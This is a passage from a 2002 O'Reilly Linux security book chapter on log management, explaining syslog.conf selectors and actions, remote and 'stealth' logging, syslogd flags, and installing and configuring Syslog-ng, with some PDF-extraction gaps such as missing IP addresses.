categories. Supported facilities in Linux are auth, auth-priv, cron, daemon, kern, lpr, mail, mark, news, syslog, user, uucp, and local0 through local7. Some of these are self-explanatory, but the following are of special note: What About klogd? One daemon you probably won’t need to reconfigure but should still be aware of is klogd, Linux’s kernel log daemon. This daemon is started automatically at boot time by the same script that starts the general system logger (probably /etc/init.d/syslogd or /etc/init.d/sysklogd, depending on which Linux distribution you use). By default, klogd directs log messages from the kernel to the system logger, which is why most people don’t need to worry about klogd: you can control the handling of ker- nel messages by editing the configuration file for syslogd. This is also true if you use Syslog-ng instead of syslog, but since Syslog-ng accepts mes- sages from a much wider variety of sources, including /proc/kmsg (which is where klogd receives its messages), some Syslog-ng users prefer to disable klogd. Don’t do so your- self unless you first configure Syslog-ng to use /proc/kmsg as a source. klogd can be invoked as a standalone logger; that is, it can send kernel messages directly to consoles or a log file. In addition, if it isn’t already running as a daemon, klogd can be used to dump the contents of the kernel log buffers (i.e., the most recent kernel messages) to a file or to the screen. These applications of klogd are especially useful to kernel developers. For most of us, it’s enough to know that for normal system operations, klogd can be safely left alone (that is, left with default settings and startup options—not disabled). Just remember that when you use syslog in Linux, all kernel messages are handled by klogd first. Example 10-1. Sample syslog.conf line mail.notice /var/log/mail This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. syslog | 325 auth Used for many security events. auth-priv Used for access-control-related messages. daemon Used by system processes and other daemons. kern Used for kernel messages. mark Messages generated by syslogd itself, which contain only a timestamp and the string --MARK--; to specify how many minutes should transpire between marks, invoke syslogd with the -m [minutes] flag. user The default facility when none is specified by an application or in a selector. ocal7 Boot messages. * Wildcard signifying “any facility.” none Wildcard signifying “no facility.” Priorities Unlike facilities, which have no relationship to each other, priorities are hierarchical. Possible priorities in Linux are (in increasing order of urgency): debug, info, notice, warning, err, crit, alert, and emerg. Note that the “urgency” of a given message is determined by the programmer who wrote it; facility and priority are set by the pro- grams that generate messages, not by syslog. As with facilities, the wildcards * and none may also be used. Only one priority or wildcard may be specified per selector. A priority may be preceded by either or both of the modifiers, = and !. If you specify a single priority in a selector (without modifiers), you’re actually speci- fying that priority plus all higher priorities. Thus the selector mail.notice translates to “all mail-related messages having a priority of notice or higher,” i.e., having a pri- ority of notice, warning, err, crit, alert, or emerg. You can specify a single priority by prefixing a = to it. The selector mail.=notice translates to “all mail-related messages having a priority of notice.” Priorities may also be negated: mail.!notice is equivalent to “all mail messages except those with priority of noticeor higher,” and mail.!=notice corresponds to “all mail messages except those with the priority notice.” This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 326 | Chapter 10: System Log Management and Monitoring Actions In practice, most log messages are written to files. If you list the full path to a file- name as a line’s action in syslog.conf, messages that match that line will be appended to that file. (If the file doesn’t exist, syslog will create it.) In Example 10-1, we instructed syslog to send matched messages to the file /var/log/mail. You can send messages other places too. An action can be a file, a named pipe, a device file, a remote host, or a user’s screen. Pipes are usually used for debugging. Device files that people use are usually TTYs. Some people also like to send security information to /dev/lp0—i.e., to a local line printer. Logs that have been printed out can’t be erased or altered by an intruder, but they also are subject to mechanical problems (paper jams, ink depletion, etc.) and are harder to parse if you need to find something in a hurry. Remote logging is one of the most useful features of syslog. If you specify a host- name or IP address preceded by an @ sign as a line’s action, messages that match that line will be sent to UDP port 514 on that remote host. For example, the line: *.emerg @mothership.mydomain.org will send all messages with emerg priority to UDP port 514 on the host named mothership.mydomain.org. Note that the remote host’s (in this example, mothership’s) syslogd process will need to have been started with the -r flag for it to accept your log messages. By default, syslogd does not accept messages from remote systems. syslog has no access-control mechanism of its own: if you enable the reception of remote messages with the -r flag, your host will accept messages on UDP port 514 from any and all remote computers. See the end of this section for some advice on how to mitigate this. If you run a central log server, which I highly recommend, you’ll want to consider some sort of access controls on it for incoming messages. At the very least, you should consider tcpwrappers’ “hosts access” (source-IP-based) controls or maybe even local firewall rules (ipchains or iptables). More sophisticated selectors You can list multiple facilities separated by commas in a single syslog.conf selector. To extend Example 10-1 to include both mail and uucp messages (still with priority notice or higher), you could use this line (Example 10-2). The same is not true of priorities. Remember that only one priority or priority wild- card may be specified in a single selector. Example 10-2. Multiple facilities in a single selector mail,uucp.notice /var/log/mail This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. syslog | 327 You may, however, specify multiple selectors separated by semicolons. When a line contains multiple selectors, they’re evaluated from left to right: you should list gen- eral selectors first, followed by more specific selectors. You can think of selectors as filters: as a message is passed through the line from left to right, it passes first through coarse filters and then through more granular ones. Continuing our one-line example, suppose we still want important mail and uucp messages to be logged to /var/log/mail, but we’d like to exclude uucp messages with priority alert. Our line then looks like Example 10-3. Stealth Logging Lance Spitzner of the Honeynet Project (http://www.honeynet.org) suggests a trick that’s useful for honey (decoy) nets and maybe even for production DMZs: “stealth logging.” This trick allows a host connected to a hub or other shared medium to send its log files to a non-IP-addressed system that sees and captures the log messages but can’t be directly accessed over the network, making it much harder for an intruder on your network to tamper with log files. The idea is simple: suppose you specify a bogus IP address in a syslog.conf action (i.e., an IP address that is legitimate for your host’s LAN but isn’t actually used by any host running syslogd). Since syslog messages are sent using the “connectionless” (one-way) UDP protocol, the sending host doesn’t expect any reply when it sends a log message. Furthermore, assuming your DMZ hosts are connected to a shared medium such as a hub, any syslog messages sent over the network will be broadcast on the local LAN. Therefore, it isn’t necessary for a central log server on that LAN to have an IP address: the log server can passively “sniff” the log messages via snort, ethereal, or some other packet sniffer. Obviously, since an IP-addressless stealth logger won’t be accessible via your usual IP- based remote administration tools, you’ll need console access to that host to view your logs. Alternatively, you can add a second network interface to the stealth logger, con- necting it to a dedicated management network or directly to your management work- station via crossover cable. In addition to configuring each DMZ host’s syslog.conf file to log to the bogus IP, you’ll also need a bogus ARP entry added to the network startup script on each sending host. If you don’t, each system will try in vain to learn the Ethernet address of the host with that IP, and it won’t send any log packets. For example, if you want a given host to pretend to send packets to the bogus IP 192. 168.192.168, then in addition to specifying @ as the action on one or more lines in /etc/syslog.conf, you’ll need to enter this command from a shell prompt: arp -s 03:03:03:31:33:77 This is not necessary if you send log packets to a “normal” log host (e.g., if 192.168. 192.168 is the IP address of a host running syslogd with the -r flag.) This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 328 | Chapter 10: System Log Management and Monitoring Actually, syslogd’s behavior isn’t as predictable as this may imply: list- ing selectors that contradict each other or that go from specific to gen- eral rather than vice versa can yield unexpected results. Therefore, it’s more accurate to say “for best results, list general selectors to the left and their exceptions (and/or more-specific selectors) to the right.” Wherever possible, keep things simple. You can use the logger com- mand to test your syslog.conf rules (see “Testing System Logging with logger” later in this chapter). Note that in the second selector (uucp.!=alert), we used the prefix != before the pri- ority to signify “not equal to.” If we wanted to exclude uucp messages with priority alert and higher (i.e, alert and emerg), we could omit the = (see Example 10-4). You might wonder what will happen to a uucp message of priority info: this matches the second selector, so it should be logged to /var/log/mail, right? Not based on the previous examples. Since the line’s first selector matches only mail and uucp mes- sages of priority notice and higher, such a message wouldn’t be evaluated against the second selector. There’s nothing to stop you from having a different line for dealing with info-level uucp messages, though. You can even have more than one line deal with these if you like. Unlike a firewall rule base, each log message is tested against all lines in /etc/ syslog.conf and acted on as many times as it matches. Suppose we want emergency messages broadcast to all logged-in users, as well as written to their respective application logs. We could use something like Example 10-5. Example 10-3. Multiple selectors in a single line mail,uucp.notice;uucp.!=alert /var/log/mail Example 10-4. Selector list with a less specific exception mail,uucp.notice;uucp.!alert /var/log/mail Example 10-5. A sample syslog.conf file # Sample syslog.conf file that sorts messages by mail, kernel, and "other," # and broadcasts emergencies to all logged-in users # print most sys. events to tty10 and to the xconsole pipe, and emergencies to everyone kern.warn;*.err;authpriv.none |/dev/xconsole *.emerg * # send mail, news (most), & kernel/firewall msgs to their respective logfiles mail.* -/var/log/mail kern.* -/var/log/kernel_n_firewall # save the rest in one file *.*;mail.none -/var/log/messages This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. syslog | 329 Did you notice the - (minus) sign in front of the write-to-file actions? This tells syslogd not to synchronize the specified log file after writing a message that matches that line. Skipping synchronization decreases disk utilization and thus improves per- formance, but it also increases the chances of introducing inconsistencies, such as missing or incomplete log messages, into those files. Use the minus sign, therefore, only in lines that you expect to result in numerous or frequent file writes. Besides performance optimization, Example 10-5 also contains some useful redun- dancy. Kernel warnings plus all messages of error-and-higher priority, except authpriv messages, are printed to the X-console window. All messages having prior- ity of emergency and higher are too, in addition to being written to the screens of all logged-in users. Furthermore, all mail messages and kernel messages are written to their respective log files. All messages of all priorities (except mail messages of any priority) are writ- ten to /var/log/messages. Example 10-5 was adapted from the default syslog.conf that SuSE 7.1 put on one of my systems. But why shouldn’t such a default syslog.conf file be fine the way it is? Why change it at all? Maybe you needn’t, but you probably should. In most cases, default syslog.conf files either: • Assign to important messages at least one action that won’t effectively bring those messages to your attention (e.g., by sending messages to a TTY console on a system you only access via SSH) • Handle at least one type of message with too much or too little redundancy to meet your needs We’ll conclude our discussion of syslog.conf with Tables 10-1 through 10-4, which summarize syslog.conf’s allowed facilities, priorities, and types of actions. Note that numeric codes should not be used in syslog.conf on Linux systems. They are pro- vided here strictly as a reference, should you need to configure a non-Linux syslog daemon that uses numeric codes (e.g., Cisco IOS), or to send syslog messages to your log server because they’re used internally (i.e., in raw syslog packets). You may see them referred to elsewhere. Table 10-1. syslog.conf’s allowed facilities Facilities Facility codes auth 4 auth-priv 10 cron 9 daemon 3 kern 0 This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 330 | Chapter 10: System Log Management and Monitoring lpr 6 mail 2 mark N/A news 7 syslog 5 user 1 uucp 8 local{0-7} 16-23 * (“any facility”) N/A Table 10-2. syslog.conf’s priorities Priorities (in increasing order) Priority codes none N/A debug 7 info 6 notice 5 warning 4 err 3 crit 2 alert 1 emerg 0 * (“any priority”) N/A Table 10-3. Use of “!” and “=” as prefixes with priorities Prefix Description *.notice (no prefix) any event with priority of ‘notice’ or higher *.!notice no event with priority of ‘notice’ or higher *.=notice only events with priority ‘notice’ *.!=notice no events with priority of ‘notice’ Table 10-4. Types of actions in syslog.conf Action Description /some/file Log to specified file -/some/file Log to specified file but don’t sync afterwards /some/pipe Log to specified pipe /dev/some/tty_or_console Log to specified console @remote.hostname.or.IP Log to specified remote host Table 10-1. syslog.conf’s allowed facilities (continued) Facilities Facility codes This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. syslog | 331 Running syslogd Just as the default syslog.conf may or may not meet your needs, the default startup mode of syslogd may need tweaking as well. Table 10-5 and subsequent paragraphs touch on some syslogd startup flags that are particularly relevant to security. For a complete list, you should refer to the manpage sysklogd (8). In addition, note that when you’re changing and testing syslog’s configuration and startup options, it usually makes sense to start and stop syslogd and klogd in tandem (see the “What About klogd?” sidebar at the beginning of this chapter if you don’t know what klogd is). Since it also makes sense to start and stop these the same way your system does, I recommend that you use your system’s syslog/klogd startup script. On most Linux systems, both facilities are controlled by the same startup script, named either /etc/init.d/syslog or /etc/init.d/sysklog (“sysklog” is shorthand for “sys- log and klogd”). See Table 10-5 for a list of some of syslogd’s flags. The first syslogd flag we’ll discuss is the only one used by default in Red Hat 7.x in its /etc/init.d/syslog script. This flag is -m 0, which disables mark messages. mark mes- sages contain only a timestamp and the string --MARK--, which some people find use- ful for navigating lengthy log files. Others find them distracting and redundant, given that each message has its own timestamp anyhow. To turn mark messages on, specify a positive nonzero value after -m that tells syslogd how many minutes should pass before it sends itself a mark message. Remember that mark has its own facility (called, predictably, “mark”) and that you must specify at least one selector that matches mark messages (such as mark.*, which matches all messages sent to the mark facility, or *.*, which matches all messages in all facilities). username1, username2, etc. Log to these users’ screens * Log to all users’ screens Table 10-5. Some useful syslogd flags Flag Description -m minutes_btwn_marks Minutes between “mark” messages (timestamp-only mes- sages that, depending on your viewpoint, either clarify or clutter logs. A value of 0 signifies “no marks”). -a /additional/socket Usedtospecifyadditionalsockets,besides/dev/log,onwhich syslogd should listen for messages. -f /path/to/syslog.conf Used to provide the path/name of syslog.conf, if different than /etc/syslog.conf. -r Listens for syslog messages from remote hosts. Table 10-4. Types of actions in syslog.conf (continued) Action Description This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 332 | Chapter 10: System Log Management and Monitoring For example, to make syslogd generate mark messages every 30 minutes and record them in /var/log/messages, you would first add a line to /etc/syslog.conf similar to Example 10-6. You would then need to start syslogd, as shown in Example 10-7. Another useful syslogd flag is -a [socket]. This allows you to specify one or more sockets (in addition to /dev/log for syslogd) from which to accept messages. In Chapter 6, we used this flag to allow a chrooted named process to bounce its mes- sages off of a dev/log socket (device-file) in the chroot jail to the nonchrooted syslogd process. In that example, BIND was running in a “padded cell” (subset of the full filesystem) and had its own log socket, /var/named/dev/log. We therefore changed a line in /etc/init.d/syslog that read as shown in Example 10-8. (Note that the “daemon” function at the beginning of this line is unique to Red Hat’s init script functions; the important part here is syslogd -m 0 -a /var/named/dev/log.) More than one -a flag may be specified (Example 10-9). Continuing down the list of flags in Table 10-5, suppose you need to test a new sys- log configuration file named syslog.conf.test, but you prefer not to overwrite /etc/ syslog.conf, which is where syslogd looks for its configuration file by default. Use the -f flag to tell syslogd to use your new configuration file (Example 10-10). We’ve already covered use of the -r flag, which tells syslogd to accept log messages from remote hosts, but we haven’t talked about the security ramifications of this. On the one hand, security is clearly enhanced when you use a centralized log server or do anything else that makes it easier for you to manage and monitor your logs. Example 10-6. syslog.conf selector for mark-messages mark.* -/var/log/messages Example 10-7. Invoking syslogd with 30-minute marks mylinuxbox:/etc/init.d# ./syslogd -m 30 Example 10-8. init.d/syslog line invoking syslogd to read messages from a chroot jail daemon syslogd -m 0 -a /var/named/dev/log Example 10-9. Invoking syslogd with multiple “additional log device” directives syslogd -a /var/named/dev/log -a /var/otherchroot/dev/log -a /additional/dev/log Example 10-10. Specifying the path to syslogd’s configuration file mylinuxbox:/etc/init.d# ./syslogd -f ./syslog.conf.test This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Syslog-ng | 333 On the other hand, you must take different threat models into account. Are your logs sensitive? If log messages traverse untrusted networks and if the inner workings of the servers that send those messages are best kept secret, then the risks may out- weigh the benefit (at least, the specific benefit of syslogd’s unauthenticated clear-text remote logging mechanism). If this is the case for you, skip to this chapter’s section on Syslog-ng. Syslog-ng can send remote messages via the TCP protocol and can therefore be used in conjunc- tion with stunnel, ssh, and other tools that greatly enhance its security. Since syslog uses only the connectionless UDP protocol for remote logging and therefore can’t “tunnel” its messages though stunnel or ssh, syslog is inherently less securable than Syslog-ng. If your log messages aren’t sensitive (at least the ones you send to a remote logger), then there’s still the problem of Denial of Service and message forgery attacks. If you invoke syslogd with the -r flag, it will accept all remote messages without performing any checks whatsoever on the validity of the messages themselves or on their senders. Again, this risk is most effectively mitigated by using Syslog-ng. But one tool you can use with syslog to partially mitigate the risk of invalid remote messages is TCPwrappers. Specifically, TCPwrappers’ “hosts access” authentication mechanism provides a simple means of defining which hosts may connect and via which protocols they may connect to your log server. Hosts-access authentication is easily tricked by source-IP-spoofing (especially since syslog transactions are strictly one way), but it’s better than nothing, and it’s probably sufficient to prevent mischie- vous but lazy attackers from interfering with syslog. If you’re willing to bet that it is, obtain and install TCPwrappers and refer to its hosts_access(5) manpage for details. Note that despite its name, TCPwrappers’ hosts access can be used to control UDP-based applications. Syslog-ng As useful and ubiquitous as syslog is, it’s beginning to show its age. Modern Unix and Unix-like systems are considerably more complex than they were when syslog was invented, and they have outgrown both syslog’s limited facilities and its primi- tive network-forwarding functionality. Syslog-ng (“syslog new generation”) is an attempt to increase syslog’s flexibility by adding better message filtering, better forwarding, and eventually (though not quite yet), message integrity and encryption. In addition, Syslog-ng supports remote log- ging over both the TCP and UDP protocols. Syslog-ng is the brainchild of and is pri- marily developed and maintained by Balazs (“Bazsi”) Scheidler. This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 334 | Chapter 10: System Log Management and Monitoring Lest you think Syslog-ng is untested or untrusted, it’s already been incorporated into Debian GNU/Linux 2.2 “Potato” as a binary package (in the “admin” section). Sys- log-ng is in fact both stable and popular. Furthermore, even though its advanced security features are still works in progress, Syslog-ng can be used in conjunction with TCP “tunneling” tools such as stunnel and ssh to authenticate or encrypt log messages sent to remote hosts. Compiling and Installing Syslog-ng from Source Code The non-Debian users among you may not wish to wait for your distribution of choice to follow suit with its own binary package of Syslog-ng. Let’s start, then, with a brief description of how to compile and install Syslog-ng from source. First, you need to obtain the latest Syslog-ng source code. As of this writing, there are two concurrent branches of Syslog-ng development. Syslog-ng Version 1.4 is the sta- ble branch, so I recommend you use the latest release of Syslog-ng 1.4. Version 1.5 is the experimental branch, and although it’s officially disclaimed as unstable, some people use it on production systems due to its new “field expansion” feature, which allows you to write messages in your own custom formats. If you decide this functionality is worth the risk of running experimental code, be sure to subscribe to the Syslog-ng mailing list (see http://lists.balabit.hu/mailman/listinfo/ syslog-ng to subscribe). Speaking of which, it probably behooves you to browse the archives of this mailing list periodically even if you stick to the stable branch of Syslog-ng. Bazsi Scheidler tends to prioritize bug fixes over documentation, so Syslog-ng documentation tends to be incomplete and even out of date. But Bazsi not only maintains the mailing list, he also very actively participates in it, as do other very knowledgeable and helpful Syslog-ng users and contributors. Thus the mailing list is an excellent source of Syslog-ng assistance. Before posting a ques- tion, you may wish to see if anyone else has asked it first. See the Syslog-ng mailing list archives at http://lists.balabit.hu/pipermail/syslog-ng/. Syslog-ng can be downloaded either directly from Bazsi Scheidler’s web site at http:// www.balabit.hu or from its Freshmeat project site at http://freshmeat.net/projects/ syslog-ng/. In addition to Syslog-ng itself, you’ll need the source code for libol, Sys- log-ng’s support library. Unzip and untar both archives. Compile and install libol first, then Syslog-ng. For both packages the procedure is the same: 1. Change the working directory to the source’s root: cd packagename 2. Run the source’s configure script: ./configure This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Syslog-ng | 335 3. Build the package: ./make 4. Install the package: ./make install This will install everything in the default locations, which for both libol and Sylog-ng are subdirectories of /usr/local (e.g., /usr/local/lib, /usr/local/sbin, etc.). If you wish to install either package somewhere else—e.g., your home directory (which is not a bad place to test new software)—then in Step 2, pass that directory to configure with the --prefix= flag as in Example 10-11. After both libol and Syslog-ng have been compiled and installed, you need to set up a few things in Syslog-ng’s operating environment. First, create the directory /etc/ syslog-ng. Next, copy one or more of the example syslog-ng.conf files into this direc- tory from the source-distribution’s contrib/ and doc/ directories (unless you intend to create your syslog-ng.conf completely from scratch). Finally, you need to create a startup script for syslog-ng in /etc/init.d and symbolic links to it in the appropriate runlevel directories (for most Linux distributions, /etc/ rc2.d, /etc/rc3.d, and /etc/rc5.d). Sample syslog-ng init scripts for several Linux distri- butions are provided in the Syslog-ng source distribution’s contrib/ directory. If you don’t find one there that works for you, it’s a simple matter to make a copy of your old syslog or sysklogd init-script and hack it to start syslog-ng rather than syslogd. Running syslog-ng It’s premature to start syslog-ng before you’ve created a configuration file. However, since syslog-ng has so few startup flags, I’ll mention them in brief and spend the remainder of this section on syslog-ng.conf use. The only flags supported by the syslog-ng daemon are listed in Table 10-6. Example 10-11. Telling configure where to install the package mylinuxbox:/usr/src/libol-0.2.23# ./configure --prefix=/your/dir/here Table 10-6. syslog-ng startup flags Flag Description -d Print debugging messages -v Print even more debugging messages -f filename Use filename as the configuration file (default=/etc/syslog-ng/syslog-ng.conf) -V Print version number -p pidfilename Name process-ID-file pidfilename (default=/var/run/syslog-ng.pid) This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 336 | Chapter 10: System Log Management and Monitoring In normal use, set these flags in the startup script you installed or created when you installed Syslog-ng, and use that script not only automatically at startup time, but also manually if you need to restart or stop Syslog-ng afterwards. Configuring Syslog-ng There’s quite a bit more involved in configuring Syslog-ng than with syslog, but that’s a symptom of its flexibility. Once you understand how syslog-ng.conf works, writing your own configurations is simple, and adapting sample configurations for your own purposes is even simpler. Its main drawback is its sketchy documentation; hopefully, what follows here will mitigate that drawback for you. By default, Syslog-ng’s configuration file is named syslog-ng.conf and resides in /etc/ syslog-ng/. Let’s dissect a simple example of one in Example 10-12. As you can see, a syslog-ng.conf file consists of options{}, source{}, destination{}, filter{}, and log{} statements. Each of these statements may contain additional set- tings, usually delimited by semicolons. Syntactically, syslog-ng.conf is very similar to C and other structured programming languages. Statements are terminated by semicolons; whitespace is ignored and may therefore be used to enhance readability (e.g., by breaking up and indenting lengthy statements across several lines). Example 10-12. A simple syslog-ng.conf file # Simple syslog-ng.conf file. options { use_fqdn(no); sync(0); }; source s_sys { unix-stream("/dev/log"); internal(); }; source s_net { udp(); }; destination d_security { file("/var/log/security"); }; destination d_messages { file("/var/log/messages"); }; destination d_console { usertty("root"); }; filter f_authpriv { facility(auth, authpriv); }; filter f_messages { level(info .. emerg) and not facility(auth, authpriv); }; filter f_emergency { level(emerg); }; log { source(s_sys); filter(f_authpriv); destination(d_security); }; log { source(s_sys); filter(f_messages); destination(d_messages); }; log { source(s_sys); filter(f_emergency); destination(d_console); }; This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Syslog-ng | 337 After defining global options, message sources, message destinations, and message filters, combine them to create logging rules. Global options Global options are set in syslog-ng.conf’s options{} section. Some options may be used in the options{} section and in one or more other sections. Predictably, options set within source{}, destination{}, filter{}, and log{} sections overrule those set in options{}. Table 10-7 lists some of the most useful of Syslog-ng’s options. Table 10-7. Syslog-ng options Option Description schain_hostnames( yes | no ) After printing the hostname provided by tcp/udp message’s sender, show names of all hosts by which a tcp or udp mes- sage has been handled (default=yes). sskeep_hostname( yes | no ) Trust hostname provided by tcp/udp message’s sender (default=no). ssuse_fqdn( yes | no ) Record full name of tcp/udp message-sender (default=no). ssuse_dns( yes | no ) Resolve IP address of tcp/udp message-sender (default=yes). ssuse_time_recvd( yes | no ) Set message’s timestamp equal to time message was received, not time contained in message (default=no). sstime_reopen( NUMBER ) Number of seconds after a tcp connection dies before recon- necting (default=60). sstime_reap( NUMBER ) Numberofsecondstowaitbeforeclosinganinactivefile(i.e., an open log file to which no messages have been written for the specified length of time) (default=60). sslog_fifo_size( NUMBER )a a These options may also be used in file() declarations within destination{} statements. Number of messages to queue in memory before processing if syslog-ng is busy; note that when queue is full, new mes- sageswillbedropped,butthelargerthefifosize,thegreater syslog-ng’s RAM footprint (default=100). sssync( NUMBER )a Number of lines (messages) written to a log file before file is synchronized (default=0). ssowner( string )a Owner of log files syslog-ng creates (default=root). ssgroup( string )a Group for log files syslog-ng creates (default=root). ssperm( NUMBER )a File-permissions for log files syslog-ng creates (default=0600). sscreate_dirs( yes | no )a Whether to create directories specified in destination-file paths if they don’t exist (default=no). ssdir_owner( string )a Owner of directories syslog-ng creates (default=root). ssdir_group( string )a Group for directories syslog-ng creates (default=root). ssdir_perm( NUMBER )a Directory permissions for directories syslog-ng creates (default=0700). This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 338 | Chapter 10: System Log Management and Monitoring Options that deal with hostnames and their resolution (chain_hostnames(), keep_ hostname(), use_fqdn(), and use_dns) deal specifically with the hostnames of remote log clients and not with hostnames/IPs referenced in the body of the message. In other words, if syslog-ng.conf on a central log server contains this statement: options { use_dns(yes); }; and the remote host joe-bob, whose IP address is, sends this message: Sep 13 19:56:56 s_sys@ sshd[13037]: Accepted publickey for ROOT from port 1355 ssh2 then the log server will log: Sep 13 19:56:56 s_sys@joebob sshd[13037]: Accepted publickey for ROOT from port 1355 ssh2 As you can see, was resolved to joebob, but wasn’t looked up. (For now you can disregard the s_sys@ in front of the hostname; I’ll explain that shortly.) The use_dns(yes) statement applies only to the hostname at the beginning of the message indicating which host sent it; it doesn’t apply to other IP addresses that may occur later in the message. Note also that options related to files and directories may be specified both in the global options{} statement and as modifiers to file() definitions within destination{} statements. file() options, when different from their global counterparts, override them. This allows you to create a “rule of thumb” with specific exceptions. The chain_hostname() and keep_hostname() options are also worth mentioning. By default, keep_hostname() is set to no, meaning that syslog-ng will not take the host- name supplied by a remote log server at face value; syslog-ng will instead resolve the source IPs of packets from that host to determine for itself what that host’s name is. This is in contrast to syslog, which takes remote hosts’ names at face value. chain_hostname() determines whether syslog-ng should list all hosts through which each message has been relayed. By default, this option is set to yes. Example 10-13 illustrates the effects of keep_hostname(no) and chain_hostname(yes) (i.e., syslog-ng’s default behavior). It shows a log message (in this case, a syslog-ng startup notification) being generated locally and then relayed twice. host1, who gives its hostname as “linux,” generates the message and then sends it to host2. host2 records both “linux” and “host1,” having double checked that hostname itself via DNS. Finally, the message is relayed to host3. Example 10-13. A log message relayed from one host to two others Original log entry on host1: Sep 19 22:57:16 s_loc@linux syslog-ng[1656]: syslog-ng version 1.4.13 starting Entry as sent to and recorded by host2: Sep 19 22:57:16 s_loc@linux/host1 syslog-ng[1656]: syslog-ng version 1.4.13 starting This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Syslog-ng | 339 There are several interesting things to note in this example. First, you can see that in the second entry (the one logged by host2), Syslog-ng does not clearly indicate that “linux” is actually host1—it simply adds the “real” hostname after the “fake” one in the slash-delimited hostname chain. Second, the timestamp is identical in all three log entries. It’s unlikely that three hosts would be in sync to the millisecond and be able to relay log messages amongst them- selves virtually instantaneously. In fact, the timestamp given to the message by the originating host (host1 here) is preserved on each host to which the message is relayed, unless a host has its own use_time_recd() option set to “yes” (which causes syslog-ng to replace message-provided timestamps with the time at which the mes- sage was received locally). Finally, Example 10-13 also shows that when host1 created the message, it (actually its local syslog-ng process) appended s_loc, to the message—this is the label of the source{} on host1 from which the local syslog-ng process received the message. Example 10-14 lists host1’s syslog-ng.conf file, the one responsible for the first entry shown in Example 10-13. Which brings us to the next topic: Syslog-ng message sources. Sources The syslog-ng.conf file listed in Example 10-14 contains one source{} definition, which itself contains two source “drivers” (message-inputs). syslog-ng.conf may con- tain many source{} definitions, each of which may, in turn, contain multiple drivers. In other words, the syntax of source definitions is as follows: source sourcelabel { driver1( [options] ); driver2( [options] ); etc. }; where sourcelabel is an arbitrary string used to identify this group of inputs, and where driver1(), driver2(), etc. are one or more source drivers that you wish to treat as a single group. Let’s take a closer look at the source definition in Example 10-14: source s_loc { unix-stream("/dev/log"); internal(); }; This line creates a source called s_loc that refers to messages obtained from /dev/log (i.e., the local system-log socket) and from the local syslog-ng process. Same log entry as relayed from host2 to host3: Sep 19 22:57:16 s_loc@linux/host1/host2 syslog-ng[1656]: syslog-ng version 1.4.13 starting Example 10-14. host1’s syslog-ng.conf file options { }; source s_loc { unix-stream("/dev/log"); internal(); }; destination d_host2 { udp("host2" port(514)); }; destination d_local { file("/var/log/messages"); }; log { source(s_loc); source(s_net); destination(d_host2); destination(d_local); }; Example 10-13. A log message relayed from one host to two others (continued) This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 340 | Chapter 10: System Log Management and Monitoring Syslog-ng is quite flexible in the variety of source drivers from which it can accept messages. In addition to Unix sockets (e.g., /dev/log), syslog-ng itself, and UDP streams from remote hosts, Syslog-ng can accept messages from named pipes, TCP connections from remote hosts, and special files (e.g., /proc files). Table 10-8 lists Syslog-ng’s supported source drivers. As we just saw in Example 10-14, internal() is syslog-ng itself: syslog-ng sends itself startup messages, errors, and other messages via this source. Therefore, you should include internal() in at least one source{} definition. file() is used to specify special files from which syslog-ng should retrieve messages. The special file you’d most likely want syslog-ng to read messages from is /proc/kmsg. Note, however, that file() is not intended for use on regular text files. If you wish syslog-ng to “tail” dynamic log files written by other applications (e.g., httpd), you’ll need to write a script that pipes the output from a tail -f [filename] command to logger. (For instructions on using logger, see the section “Testing System Logging with logger” later in this chapter.) unix_stream() and unix_dgram() are important drivers: these read messages from connection-oriented and connectionless Unix sockets, respectively. As noted at the end of “Compiling and Installing Syslog-ng from Source Code,” Linux kernels Ver- sions 2.4.1 and higher use Unix datagram sockets; if you specify /dev/log as a unix_ stream() source, kernel messages won’t be captured. Therefore, use unix_dgram() when defining your local-system log source, e.g.: source s_loc { unix-dgram("/dev/log"); internal(); }; Table 10-8. Source drivers for Syslog-ng Source Description internal() Messages from the syslog-ng daemon itself. file("filename" [options]) Messages read from a special file such as /proc/kmsg. pipe("filename" ) Messages received from a named pipe. unix_stream("filename" [options]) Messages received from Unix sockets that can be read from in the connection-oriented stream mode—e.g., /dev/log under kernels prior to 2.4; the maximum allowed number of concurrent stream connections may be specified (default=100). unix_dgram("filename" [options]) Messages received from Unix sockets that can be read from in the connectionlessdatagrammode—e.g.klogdmessagesfrom/dev/log under kernel 2.4.x. tcp([ip(address)] [port(#)] [max-connections(#)] ) Messages received from remote hosts via the tcp protocol on the specified TCP port (default=514) on the specified local network interface (default=all); the maximum number of concurrent TCP connections may be specified (default=10). udp([ip(address)] [port(#)] ) Messages received from remote hosts via the udp protocol on the specified UDP port (default=514) on the specified local network interface (default=all). This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Syslog-ng | 341 If your kernel is pre-2.4.0, you should instead use unix_stream() for /dev/log. tcp() and udp() read messages from remote hosts via the connection-oriented TCP protocol and the connectionless UDP protocol, respectively. In both tcp() and udp(), a listening address and a port number may be specified. By default, syslog-ng listens on—that is, “all interfaces, port 514.” (Specifically, the default for tcp() is, and for udp(), that is Example 10-15 shows source statements for tcp() and udp(), with IP and port options defined. In Example 10-15, we’re defining the source s_tcpmessages as all messages received on TCP port 10514, but only on 